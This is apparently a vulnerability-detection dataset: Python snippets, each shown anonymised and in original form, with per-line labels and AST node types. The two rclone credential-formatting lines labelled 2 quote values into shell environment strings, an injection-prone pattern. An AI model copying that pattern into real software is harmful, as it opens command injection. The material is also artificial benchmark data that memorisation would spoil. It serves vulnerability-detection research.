[ "def setUp(self):...\n", "super(AuthenticatingHandlerTest, self).setUp()\n", "api.reset_local_state()\n", "self.logged_errors = []\n", "self.mock(handler.logging, 'error', lambda *args, **kwargs: self.\n logged_errors.append((args, kwargs)))\n", "self.logged_warnings = []\n", "self.mock(handler.logging, 'warning', lambda *args, **kwargs: self.\n logged_warnings.append((args, kwargs)))\n" ]
[ 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Expr'", "Expr'", "Assign'", "Expr'", "Assign'", "Expr'" ]
[ "def FUNC_13(self, VAR_16):...\n", "\"\"\"docstring\"\"\"\n", "self._check_volume(VAR_16)\n", "VAR_0.warn(_('Volume %s was not found while trying to delete it'), VAR_16[\n 'name'])\n", "self._eql_execute('volume', 'select', VAR_16['name'], 'offline')\n", "VAR_0.error(_('Failed to delete volume %s'), VAR_16['name'])\n", "self._eql_execute('volume', 'delete', VAR_16['name'])\n" ]
[ "def delete_volume(self, volume):...\n", "\"\"\"docstring\"\"\"\n", "self._check_volume(volume)\n", "LOG.warn(_('Volume %s was not found while trying to delete it'), volume['name']\n )\n", "self._eql_execute('volume', 'select', volume['name'], 'offline')\n", "LOG.error(_('Failed to delete volume %s'), volume['name'])\n", "self._eql_execute('volume', 'delete', volume['name'])\n" ]
[ 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'" ]
[ "def __init__(self, VAR_51, VAR_31):...\n", "self.orig_obj = VAR_51\n", "self.lock = VAR_31\n", "self._wrapper_cache = {}\n" ]
[ "def __init__(self, orig_obj, lock):...\n", "self.orig_obj = orig_obj\n", "self.lock = lock\n", "self._wrapper_cache = {}\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Assign'" ]
[ "def FUNC_55(self):...\n", "\"\"\"docstring\"\"\"\n", "self.run_example('multiline_statement.py')\n", "self.assertEqual(0, len(self.b_mgr.skipped))\n", "self.assertEqual(1, len(self.b_mgr.files_list))\n", "self.assertTrue(self.b_mgr.files_list[0].endswith('multiline_statement.py'))\n", "VAR_10 = self.b_mgr.get_issue_list()\n", "self.assertEqual(2, len(VAR_10))\n", "self.assertTrue(VAR_10[0].fname.endswith('examples/multiline_statement.py'))\n", "self.assertEqual(1, VAR_10[0].lineno)\n", "self.assertEqual(list(range(1, 3)), VAR_10[0].linerange)\n", "self.assertIn('subprocess', VAR_10[0].get_code())\n", "self.assertEqual(5, VAR_10[1].lineno)\n", "self.assertEqual(list(range(3, 6 + 1)), VAR_10[1].linerange)\n", "self.assertIn('shell=True', VAR_10[1].get_code())\n" ]
[ "def test_multiline_code(self):...\n", "\"\"\"docstring\"\"\"\n", "self.run_example('multiline_statement.py')\n", "self.assertEqual(0, len(self.b_mgr.skipped))\n", "self.assertEqual(1, len(self.b_mgr.files_list))\n", "self.assertTrue(self.b_mgr.files_list[0].endswith('multiline_statement.py'))\n", "issues = self.b_mgr.get_issue_list()\n", "self.assertEqual(2, len(issues))\n", "self.assertTrue(issues[0].fname.endswith('examples/multiline_statement.py'))\n", "self.assertEqual(1, issues[0].lineno)\n", "self.assertEqual(list(range(1, 3)), issues[0].linerange)\n", "self.assertIn('subprocess', issues[0].get_code())\n", "self.assertEqual(5, issues[1].lineno)\n", "self.assertEqual(list(range(3, 6 + 1)), issues[1].linerange)\n", "self.assertIn('shell=True', issues[1].get_code())\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Expr'", "Expr'", "Expr'", "Expr'", "Assign'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_0(self, *VAR_5, **VAR_4):...\n", "if self.run_local:\n", "return utils.execute(*VAR_5, **kwargs)\n", "VAR_7 = VAR_4.pop('check_exit_code', None)\n", "VAR_6 = ' '.join(VAR_5)\n", "return self._run_ssh(VAR_6, VAR_7)\n" ]
[ "def san_execute(self, *cmd, **kwargs):...\n", "if self.run_local:\n", "return utils.execute(*cmd, **kwargs)\n", "check_exit_code = kwargs.pop('check_exit_code', None)\n", "command = ' '.join(cmd)\n", "return self._run_ssh(command, check_exit_code)\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Condition", "Return'", "Assign'", "Assign'", "Return'" ]
[ "async def FUNC_15(VAR_3):...\n", "VAR_19 = await VAR_1(VAR_3, VAR_4)\n", "return VAR_19\n" ]
[ "async def ret(request):...\n", "out = await func(request, base)\n", "return out\n" ]
[ 0, 0, 0 ]
[ "AsyncFunctionDef'", "Assign'", "Return'" ]
[ "def FUNC_17(self, VAR_16):...\n", "print('WARNING: Ignoring propagate -- Function not set')\n" ]
[ "def propagate(self, model):...\n", "print('WARNING: Ignoring propagate -- Function not set')\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Expr'" ]
[ "def FUNC_14(self, VAR_64):...\n", "self._onerror = VAR_64\n" ]
[ "def onerror(self, func):...\n", "self._onerror = func\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Assign'" ]
[ "def FUNC_2(self, VAR_13):...\n", "VAR_23 = False\n", "VAR_24 = False\n", "if self.notRegex:\n", "VAR_36 = re.search(self.notRegex, VAR_13)\n", "if self.trueRegex and not VAR_23:\n", "if VAR_36 == None:\n", "VAR_36 = re.search(self.trueRegex, VAR_13)\n", "return VAR_23\n", "VAR_23 = True\n", "if VAR_36:\n", "if self.trueRegex:\n", "VAR_23 = str(VAR_36.group(1))\n", "VAR_23 = str(VAR_36.group(0))\n", "VAR_45 = re.search(self.trueRegex, VAR_13)\n", "if VAR_45:\n", "VAR_23 = str(VAR_45.groups())\n" ]
[ "def isASuccessfulUpload(self, html):...\n", "result = False\n", "validExt = False\n", "if self.notRegex:\n", "fileUploaded = re.search(self.notRegex, html)\n", "if self.trueRegex and not result:\n", "if fileUploaded == None:\n", "fileUploaded = re.search(self.trueRegex, html)\n", "return result\n", "result = True\n", "if fileUploaded:\n", "if self.trueRegex:\n", "result = str(fileUploaded.group(1))\n", "result = str(fileUploaded.group(0))\n", "moreInfo = re.search(self.trueRegex, html)\n", "if moreInfo:\n", "result = str(moreInfo.groups())\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Condition", "Assign'", "Condition", "Condition", "Assign'", "Return'", "Assign'", "Condition", "Condition", "Assign'", "Assign'", "Assign'", "Condition", "Assign'" ]
[ "def FUNC_9(self):...\n", "return Client(VAR_25=self.host, VAR_26=self.port, VAR_27=self.\n connect_timeout, VAR_28=self.send_receive_timeout, settings=self.\n client_settings)\n" ]
[ "def _create_conn(self):...\n", "return Client(host=self.host, port=self.port, connect_timeout=self.\n connect_timeout, send_receive_timeout=self.send_receive_timeout,\n settings=self.client_settings)\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_10(self, VAR_14):...\n", "" ]
[ "def is_text(self, col_name):...\n", "" ]
[ 0, 0 ]
[ "FunctionDef'", "Condition" ]
[ "def FUNC_3(VAR_10=None, VAR_4=None):...\n", "\"\"\"docstring\"\"\"\n", "VAR_10 = VAR_10 or []\n", "VAR_4 = VAR_4 or []\n", "VAR_13 = hashlib.md5(str(time.time())).hexdigest()\n", "VAR_14 = []\n", "for VAR_18, VAR_9 in VAR_10:\n", "VAR_18 = FUNC_2(VAR_18)\n", "for VAR_18, VAR_19, VAR_9 in VAR_4:\n", "VAR_9 = FUNC_2(VAR_9)\n", "VAR_18 = FUNC_2(VAR_18)\n", "if len(VAR_14) > 1:\n", "VAR_14.append('--' + VAR_13)\n", "VAR_19 = FUNC_2(VAR_19)\n", "VAR_14[-2] += '--'\n", "VAR_15 = '\\r\\n'.join(VAR_14)\n", "VAR_14.append('Content-Disposition: form-data; name=\"%s\"' % VAR_18)\n", "VAR_9 = FUNC_2(VAR_9)\n", "VAR_16 = 'multipart/form-data; boundary=%s' % VAR_13\n", "VAR_14.append('')\n", "VAR_14.append('--' + VAR_13)\n", "return VAR_16, VAR_15\n", "VAR_14.append(VAR_9)\n", "VAR_14.append('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' %\n (VAR_18, VAR_19))\n", "VAR_14.append('--' + VAR_13)\n", "VAR_14.append('Content-Type: application/octet-stream')\n", "VAR_14.append('')\n", "VAR_14.append('')\n", "VAR_14.append(VAR_9)\n", "VAR_14.append('--' + VAR_13)\n", "VAR_14.append('')\n" ]
[ "def EncodeMultipartFormData(fields=None, files=None):...\n", "\"\"\"docstring\"\"\"\n", "fields = fields or []\n", "files = files or []\n", "boundary = hashlib.md5(str(time.time())).hexdigest()\n", "body_list = []\n", "for key, value in fields:\n", "key = _ConvertToAscii(key)\n", "for key, filename, value in files:\n", "value = _ConvertToAscii(value)\n", "key = _ConvertToAscii(key)\n", "if len(body_list) > 1:\n", "body_list.append('--' + boundary)\n", "filename = _ConvertToAscii(filename)\n", "body_list[-2] += '--'\n", "body = '\\r\\n'.join(body_list)\n", "body_list.append('Content-Disposition: form-data; name=\"%s\"' % key)\n", "value = _ConvertToAscii(value)\n", "content_type = 'multipart/form-data; boundary=%s' % boundary\n", "body_list.append('')\n", "body_list.append('--' + boundary)\n", "return content_type, body\n", "body_list.append(value)\n", "body_list.append('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' %\n (key, filename))\n", "body_list.append('--' + boundary)\n", "body_list.append('Content-Type: application/octet-stream')\n", "body_list.append('')\n", "body_list.append('')\n", "body_list.append(value)\n", "body_list.append('--' + boundary)\n", "body_list.append('')\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "For", "Assign'", "For", "Assign'", "Assign'", "Condition", "Expr'", "Assign'", "AugAssign'", "Assign'", "Expr'", "Assign'", "Assign'", "Expr'", "Expr'", "Return'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_17(VAR_20, **VAR_19):...\n", "\"\"\"docstring\"\"\"\n", "VAR_4[VAR_20] = VAR_19\n" ]
[ "def add_existing_task(task_id, **kwargs):...\n", "\"\"\"docstring\"\"\"\n", "created_tasks[task_id] = kwargs\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'" ]
[ "def FUNC_26(self, VAR_14):...\n", "" ]
[ "def get_max_length(self, col_name):...\n", "" ]
[ 0, 0 ]
[ "FunctionDef'", "Condition" ]
[ "def FUNC_13(VAR_2, VAR_3, VAR_11):...\n", "return libdate(VAR_2=year, VAR_3=month, VAR_11=day).strftime('%Y-%m-%d')\n" ]
[ "def get_str_date(year, month, day):...\n", "return libdate(year=year, month=month, day=day).strftime('%Y-%m-%d')\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "\"\"\"string\"\"\"\n", "import random\n", "from eventlet import greenthread\n", "from oslo.config import cfg\n", "from cinder import exception\n", "from cinder.openstack.common import excutils\n", "from cinder.openstack.common import log as logging\n", "from cinder import utils\n", "from cinder.volume import driver\n", "VAR_0 = logging.getLogger(__name__)\n", "VAR_1 = [cfg.BoolOpt('san_thin_provision', default=True, help=\n 'Use thin provisioning for SAN volumes?'), cfg.StrOpt('san_ip', default\n ='', help='IP address of SAN controller'), cfg.StrOpt('san_login',\n default='admin', help='Username for SAN controller'), cfg.StrOpt(\n 'san_password', default='', help='Password for SAN controller', secret=\n True), cfg.StrOpt('san_private_key', default='', help=\n 'Filename of private key to use for SSH authentication'), cfg.StrOpt(\n 'san_clustername', default='', help=\n 'Cluster name to use for creating volumes'), cfg.IntOpt('san_ssh_port',\n default=22, help='SSH port to use with SAN'), cfg.BoolOpt(\n 'san_is_local', default=False, help=\n 'Execute commands locally instead of over SSH; use if the volume service is running on the SAN device'\n ), cfg.IntOpt('ssh_conn_timeout', default=30, help=\n 'SSH connection timeout in seconds'), cfg.IntOpt('ssh_min_pool_conn',\n default=1, help='Minimum ssh connections in the pool'), cfg.IntOpt(\n 'ssh_max_pool_conn', default=5, help='Maximum ssh connections in the pool')\n ]\n", "VAR_2 = cfg.CONF\n", "VAR_2.register_opts(VAR_1)\n", "\"\"\"string\"\"\"\n", "def __init__(self, *VAR_3, **VAR_4):...\n", "VAR_11 = VAR_4.pop('execute', self.san_execute)\n", "super(CLASS_0, self).__init__(*VAR_3, VAR_11=execute, **kwargs)\n", "self.configuration.append_config_values(VAR_1)\n", "self.run_local = self.configuration.san_is_local\n", "self.sshpool = None\n", "def FUNC_0(self, *VAR_5, **VAR_4):...\n", "if self.run_local:\n", "return utils.execute(*VAR_5, **kwargs)\n", "VAR_7 = VAR_4.pop('check_exit_code', None)\n", "VAR_6 = ' '.join(VAR_5)\n", "return self._run_ssh(VAR_6, VAR_7)\n" ]
[ "\"\"\"\nDefault Driver for san-stored volumes.\n\nThe unique thing about a SAN is that we don't expect that we can run the volume\ncontroller on the SAN hardware. We expect to access it over SSH or some API.\n\"\"\"\n", "import random\n", "from eventlet import greenthread\n", "from oslo.config import cfg\n", "from cinder import exception\n", "from cinder.openstack.common import excutils\n", "from cinder.openstack.common import log as logging\n", "from cinder import utils\n", "from cinder.volume import driver\n", "LOG = logging.getLogger(__name__)\n", "san_opts = [cfg.BoolOpt('san_thin_provision', default=True, help=\n 'Use thin provisioning for SAN volumes?'), cfg.StrOpt('san_ip', default\n ='', help='IP address of SAN controller'), cfg.StrOpt('san_login',\n default='admin', help='Username for SAN controller'), cfg.StrOpt(\n 'san_password', default='', help='Password for SAN controller', secret=\n True), cfg.StrOpt('san_private_key', default='', help=\n 'Filename of private key to use for SSH authentication'), cfg.StrOpt(\n 'san_clustername', default='', help=\n 'Cluster name to use for creating volumes'), cfg.IntOpt('san_ssh_port',\n default=22, help='SSH port to use with SAN'), cfg.BoolOpt(\n 'san_is_local', default=False, help=\n 'Execute commands locally instead of over SSH; use if the volume service is running on the SAN device'\n ), cfg.IntOpt('ssh_conn_timeout', default=30, help=\n 'SSH connection timeout in seconds'), cfg.IntOpt('ssh_min_pool_conn',\n default=1, help='Minimum ssh connections in the pool'), cfg.IntOpt(\n 'ssh_max_pool_conn', default=5, help='Maximum ssh connections in the pool')\n ]\n", "CONF = cfg.CONF\n", "CONF.register_opts(san_opts)\n", "\"\"\"Base class for SAN-style storage volumes\n\n A SAN-style storage value is 'different' because the volume controller\n probably won't run on it, so we need to access is over SSH or another\n remote protocol.\n \"\"\"\n", "def __init__(self, *args, **kwargs):...\n", "execute = kwargs.pop('execute', self.san_execute)\n", "super(SanDriver, self).__init__(*args, execute=execute, **kwargs)\n", "self.configuration.append_config_values(san_opts)\n", "self.run_local = self.configuration.san_is_local\n", "self.sshpool = None\n", "def san_execute(self, *cmd, **kwargs):...\n", "if self.run_local:\n", "return utils.execute(*cmd, **kwargs)\n", "check_exit_code = kwargs.pop('check_exit_code', None)\n", "command = ' '.join(cmd)\n", "return self._run_ssh(command, check_exit_code)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Expr'", "Import'", "ImportFrom'", "ImportFrom'", "ImportFrom'", "ImportFrom'", "ImportFrom'", "ImportFrom'", "ImportFrom'", "Assign'", "Assign'", "Assign'", "Expr'", "Expr'", "FunctionDef'", "Assign'", "Expr'", "Expr'", "Assign'", "Assign'", "FunctionDef'", "Condition", "Return'", "Assign'", "Assign'", "Return'" ]
[ "def FUNC_14(self, VAR_17):...\n", "VAR_28 = self._Read(os.path.join('tools', 'md_browser', VAR_17), VAR_20=SRC_DIR\n )\n", "self.wfile.write(VAR_28.encode('utf-8'))\n" ]
[ "def _WriteTemplate(self, template):...\n", "contents = self._Read(os.path.join('tools', 'md_browser', template),\n relative_to=SRC_DIR)\n", "self.wfile.write(contents.encode('utf-8'))\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Expr'" ]
[ "def FUNC_0():...\n", "return [[{'contact_ign': 'wreddnuy', 'conversion_rate': 12.0, 'stock': 100,\n 'have': 'Chaos', 'want': 'Alteration'}, {'contact_ign': 'Shioua_ouah',\n 'conversion_rate': 0.6897, 'stock': 1576, 'have': 'Alteration', 'want':\n 'Chromatic'}, {'contact_ign': 'MVP_Kefir', 'conversion_rate': 0.087,\n 'stock': 200, 'have': 'Chromatic', 'want': 'Chaos'}], [{'contact_ign':\n 'wreddnuy', 'conversion_rate': 12.0, 'stock': 100, 'have': 'Chaos',\n 'want': 'Alteration'}, {'contact_ign': 'Shioua_ouah', 'conversion_rate':\n 0.6897, 'stock': 1576, 'have': 'Alteration', 'want': 'Chromatic'}, {\n 'contact_ign': '_ZEUS___', 'conversion_rate': 0.0909, 'stock': 100,\n 'have': 'Chromatic', 'want': 'Chaos'}], [{'contact_ign': 'wreddnuy',\n 'conversion_rate': 12.0, 'stock': 100, 'have': 'Chaos', 'want':\n 'Alteration'}, {'contact_ign': 'Ashkeri', 'conversion_rate': 0.7143,\n 'stock': 449, 'have': 'Alteration', 'want': 'Chromatic'}, {\n 'contact_ign': 'MVP_Kefir', 'conversion_rate': 0.087, 'stock': 200,\n 'have': 'Chromatic', 'want': 'Chaos'}], [{'contact_ign': 'wreddnuy',\n 'conversion_rate': 12.0, 'stock': 100, 'have': 'Chaos', 'want':\n 'Alteration'}, {'contact_ign': 'Ashkeri', 'conversion_rate': 0.7143,\n 'stock': 449, 'have': 'Alteration', 'want': 'Chromatic'}, {\n 'contact_ign': '_ZEUS___', 'conversion_rate': 0.0909, 'stock': 100,\n 'have': 'Chromatic', 'want': 'Chaos'}]]\n" ]
[ "def expected_paths_small_same_currency():...\n", "return [[{'contact_ign': 'wreddnuy', 'conversion_rate': 12.0, 'stock': 100,\n 'have': 'Chaos', 'want': 'Alteration'}, {'contact_ign': 'Shioua_ouah',\n 'conversion_rate': 0.6897, 'stock': 1576, 'have': 'Alteration', 'want':\n 'Chromatic'}, {'contact_ign': 'MVP_Kefir', 'conversion_rate': 0.087,\n 'stock': 200, 'have': 'Chromatic', 'want': 'Chaos'}], [{'contact_ign':\n 'wreddnuy', 'conversion_rate': 12.0, 'stock': 100, 'have': 'Chaos',\n 'want': 'Alteration'}, {'contact_ign': 'Shioua_ouah', 'conversion_rate':\n 0.6897, 'stock': 1576, 'have': 'Alteration', 'want': 'Chromatic'}, {\n 'contact_ign': '_ZEUS___', 'conversion_rate': 0.0909, 'stock': 100,\n 'have': 'Chromatic', 'want': 'Chaos'}], [{'contact_ign': 'wreddnuy',\n 'conversion_rate': 12.0, 'stock': 100, 'have': 'Chaos', 'want':\n 'Alteration'}, {'contact_ign': 'Ashkeri', 'conversion_rate': 0.7143,\n 'stock': 449, 'have': 'Alteration', 'want': 'Chromatic'}, {\n 'contact_ign': 'MVP_Kefir', 'conversion_rate': 0.087, 'stock': 200,\n 'have': 'Chromatic', 'want': 'Chaos'}], [{'contact_ign': 'wreddnuy',\n 'conversion_rate': 12.0, 'stock': 100, 'have': 'Chaos', 'want':\n 'Alteration'}, {'contact_ign': 'Ashkeri', 'conversion_rate': 0.7143,\n 'stock': 449, 'have': 'Alteration', 'want': 'Chromatic'}, {\n 'contact_ign': '_ZEUS___', 'conversion_rate': 0.0909, 'stock': 100,\n 'have': 'Chromatic', 'want': 'Chaos'}]]\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_8(VAR_1, VAR_6=None, VAR_7=None, **VAR_8):...\n", "\"\"\"docstring\"\"\"\n", "warnings.warn('tquery() is deprecated. Use history() or live() instead.',\n DeprecationWarning)\n", "VAR_9 = VAR_8.get('delta', datetime.timedelta(hours=4))\n", "VAR_6, VAR_7 = FUNC_9(VAR_6, VAR_7, VAR_9)\n", "VAR_27 = FUNC_6(VAR_1, VAR_6, VAR_7, **kwargs)\n", "return VAR_27\n" ]
[ "def tquery(conn, start=None, end=None, **kwargs):...\n", "\"\"\"docstring\"\"\"\n", "warnings.warn('tquery() is deprecated. Use history() or live() instead.',\n DeprecationWarning)\n", "delta = kwargs.get('delta', datetime.timedelta(hours=4))\n", "start, end = get_trange(start, end, delta)\n", "result = history(conn, start, end, **kwargs)\n", "return result\n" ]
[ 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Expr'", "Assign'", "Assign'", "Assign'", "Return'" ]
[ "def FUNC_0(self, VAR_3, VAR_4=True):...\n", "def FUNC_21(VAR_16):...\n", "return (VAR_16.input, VAR_16.dynamic_input) if VAR_4 else (VAR_16.output,\n VAR_16.dynamic_output)\n" ]
[ "def dynamic_branch(self, wildcards, input=True):...\n", "def get_io(rule):...\n", "return (rule.input, rule.dynamic_input) if input else (rule.output, rule.\n dynamic_output)\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "FunctionDef'", "Return'" ]
[ "def FUNC_12(self, VAR_1, VAR_8):...\n", "\"\"\"docstring\"\"\"\n", "VAR_13 = 'RCLONE_CONFIG_{}'.format(VAR_8.upper())\n", "VAR_12 = ''\n", "VAR_12 += \"{}_TYPE='{}' \".format(VAR_13, VAR_1.type)\n", "def FUNC_21(VAR_12, VAR_14, VAR_15):...\n", "VAR_31 = getattr(VAR_1, VAR_15, None)\n", "if VAR_31 is not None:\n", "VAR_12 += \"{}='{}' \".format(VAR_14, VAR_31)\n", "return VAR_12\n" ]
[ "def _formatCredentials(self, data, name):...\n", "\"\"\"docstring\"\"\"\n", "prefix = 'RCLONE_CONFIG_{}'.format(name.upper())\n", "credentials = ''\n", "credentials += \"{}_TYPE='{}' \".format(prefix, data.type)\n", "def _addCredential(credentials, env_key, data_key):...\n", "value = getattr(data, data_key, None)\n", "if value is not None:\n", "credentials += \"{}='{}' \".format(env_key, value)\n", "return credentials\n" ]
[ 0, 0, 0, 0, 2, 0, 0, 0, 2, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "AugAssign'", "FunctionDef'", "Assign'", "Condition", "AugAssign'", "Return'" ]
[ "def __init__(self, VAR_7, VAR_57, VAR_58=True, **VAR_16):...\n", "self.nav = VAR_57\n", "self.remember = VAR_58\n", "VAR_7 = VAR_57.get_param, VAR_7\n", "CLASS_0.__init__(self, VAR_7, **kw)\n" ]
[ "def __init__(self, param, menu_cls, remember=True, **kw):...\n", "self.nav = menu_cls\n", "self.remember = remember\n", "param = menu_cls.get_param, param\n", "Validator.__init__(self, param, **kw)\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Assign'", "Expr'" ]
[ "def FUNC_13(self, VAR_25='default.yaml'):...\n", "self.config = load(data_file, Loader)\n" ]
[ "def load_config(self, filename='default.yaml'):...\n", "self.config = load(data_file, Loader)\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Assign'" ]
[ "def FUNC_5(self, VAR_18, VAR_19):...\n", "if self.shouldLog:\n", "if self.logger.verbosity > 0:\n", "VAR_28 = self.session.get(VAR_18)\n", "self.logger.debug('Requesting %s ...', VAR_18)\n", "if self.shouldLog:\n", "if VAR_28.status_code >= 400:\n", "VAR_29 = re.search(VAR_19, VAR_28.text)\n", "self.logger.warning('Code exec detection returned an http code of %s.',\n VAR_28.status_code)\n", "self.httpRequests += 1\n", "if VAR_29:\n", "if self.logger.verbosity > 1:\n", "return True\n", "return False\n", "printSimpleResponseObject(VAR_28)\n", "if self.logger.verbosity > 2:\n", "print('\\x1b[36m' + VAR_28.text + '\\x1b[m')\n" ]
[ "def detectCodeExec(self, url, regex):...\n", "if self.shouldLog:\n", "if self.logger.verbosity > 0:\n", "r = self.session.get(url)\n", "self.logger.debug('Requesting %s ...', url)\n", "if self.shouldLog:\n", "if r.status_code >= 400:\n", "res = re.search(regex, r.text)\n", "self.logger.warning('Code exec detection returned an http code of %s.', r.\n status_code)\n", "self.httpRequests += 1\n", "if res:\n", "if self.logger.verbosity > 1:\n", "return True\n", "return False\n", "printSimpleResponseObject(r)\n", "if self.logger.verbosity > 2:\n", "print('\\x1b[36m' + r.text + '\\x1b[m')\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Condition", "Condition", "Assign'", "Expr'", "Condition", "Condition", "Assign'", "Expr'", "AugAssign'", "Condition", "Condition", "Return'", "Return'", "Expr'", "Condition", "Expr'" ]
[ "@wraps(VAR_8)...\n", "if g.oidc_id_token is None:\n", "return self.redirect_to_auth_server(request.url)\n", "return VAR_8(*VAR_14, **kwargs)\n" ]
[ "@wraps(view_func)...\n", "if g.oidc_id_token is None:\n", "return self.redirect_to_auth_server(request.url)\n", "return view_func(*args, **kwargs)\n" ]
[ 0, 0, 0, 0 ]
[ "Condition", "Condition", "Return'", "Return'" ]
[ "def FUNC_6(self):...\n", "VAR_24 = self.add_argument_group('Facebook Messenger')\n", "VAR_24.add_argument('--debug', dest='is_debug', action='store_true', help=\n 'print and log all server interactions and messages')\n", "VAR_24.add_argument('--verbose', dest='verbose', action='store_true', help=\n 'print all messages sent to and from Turkers')\n", "VAR_24.add_argument('--log-level', dest='log_level', type=int, default=20,\n help=\n 'importance level for what to put into the logs. the lower the level the more that gets logged. values are 0-50'\n )\n", "VAR_24.add_argument('--force-page-token', dest='force_page_token', action=\n 'store_true', help=\n 'override the page token stored in the cache for a new one')\n", "VAR_24.add_argument('--password', dest='password', type=str, default=None,\n help='Require a password for entry to the bot')\n", "VAR_24.add_argument('--local', dest='local', action='store_true', default=\n False, help=\n 'Run the server locally on this server rather than setting up a heroku server.'\n )\n", "VAR_24.set_defaults(is_debug=False)\n", "VAR_24.set_defaults(verbose=False)\n" ]
[ "def add_messenger_args(self):...\n", "messenger = self.add_argument_group('Facebook Messenger')\n", "messenger.add_argument('--debug', dest='is_debug', action='store_true',\n help='print and log all server interactions and messages')\n", "messenger.add_argument('--verbose', dest='verbose', action='store_true',\n help='print all messages sent to and from Turkers')\n", "messenger.add_argument('--log-level', dest='log_level', type=int, default=\n 20, help=\n 'importance level for what to put into the logs. the lower the level the more that gets logged. values are 0-50'\n )\n", "messenger.add_argument('--force-page-token', dest='force_page_token',\n action='store_true', help=\n 'override the page token stored in the cache for a new one')\n", "messenger.add_argument('--password', dest='password', type=str, default=\n None, help='Require a password for entry to the bot')\n", "messenger.add_argument('--local', dest='local', action='store_true',\n default=False, help=\n 'Run the server locally on this server rather than setting up a heroku server.'\n )\n", "messenger.set_defaults(is_debug=False)\n", "messenger.set_defaults(verbose=False)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_11(self):...\n", "VAR_25 = 0\n", "while True:\n", "yield VAR_25\n", "VAR_25 += 1\n" ]
[ "def _id_counter(self):...\n", "i = 0\n", "while True:\n", "yield i\n", "i += 1\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Expr'", "AugAssign'" ]
[ "def FUNC_3(VAR_1):...\n", "\"\"\"docstring\"\"\"\n", "print('What are the most popular %d articles of all time?\\n' % VAR_1)\n", "VAR_6 = '\"%s\" - %d views\\n'\n", "VAR_7 = ''.join(VAR_6 % (title, views) for title, views in FUNC_0(VAR_1))\n", "print(VAR_7)\n" ]
[ "def print_top_articles(list_count):...\n", "\"\"\"docstring\"\"\"\n", "print('What are the most popular %d articles of all time?\\n' % list_count)\n", "top_articles = '\"%s\" - %d views\\n'\n", "results = ''.join(top_articles % (title, views) for title, views in\n get_top_articles(list_count))\n", "print(results)\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Expr'", "Assign'", "Assign'", "Expr'" ]
[ "def __str__(self):...\n", "return 'Could not sign in.\\n' + super().__str__()\n" ]
[ "def __str__(self):...\n", "return 'Could not sign in.\\n' + super().__str__()\n" ]
[ 0, 5 ]
[ "FunctionDef'", "Return'" ]
[ "@VAR_0.route('/disconnect/<remote_app>/')...\n", "\"\"\"docstring\"\"\"\n", "if VAR_1 not in disconnect_handlers:\n", "return abort(404)\n", "return disconnect_handlers[VAR_1]()\n" ]
[ "@blueprint.route('/disconnect/<remote_app>/')...\n", "\"\"\"docstring\"\"\"\n", "if remote_app not in disconnect_handlers:\n", "return abort(404)\n", "return disconnect_handlers[remote_app]()\n" ]
[ 0, 0, 0, 0, 0 ]
[ "Condition", "Docstring", "Condition", "Return'", "Return'" ]
[ "def FUNC_8(self, VAR_10):...\n", "\"\"\"docstring\"\"\"\n", "VAR_5 = {}\n", "VAR_5['volumeName'] = VAR_10['name']\n", "VAR_5['prompt'] = 'false'\n", "VAR_27 = self._cliq_get_volume_info(VAR_10['name'])\n", "VAR_0.error('Volume did not exist. It will not be deleted')\n", "self._cliq_run_xml('deleteVolume', VAR_5)\n", "return\n" ]
[ "def delete_volume(self, volume):...\n", "\"\"\"docstring\"\"\"\n", "cliq_args = {}\n", "cliq_args['volumeName'] = volume['name']\n", "cliq_args['prompt'] = 'false'\n", "volume_info = self._cliq_get_volume_info(volume['name'])\n", "LOG.error('Volume did not exist. It will not be deleted')\n", "self._cliq_run_xml('deleteVolume', cliq_args)\n", "return\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
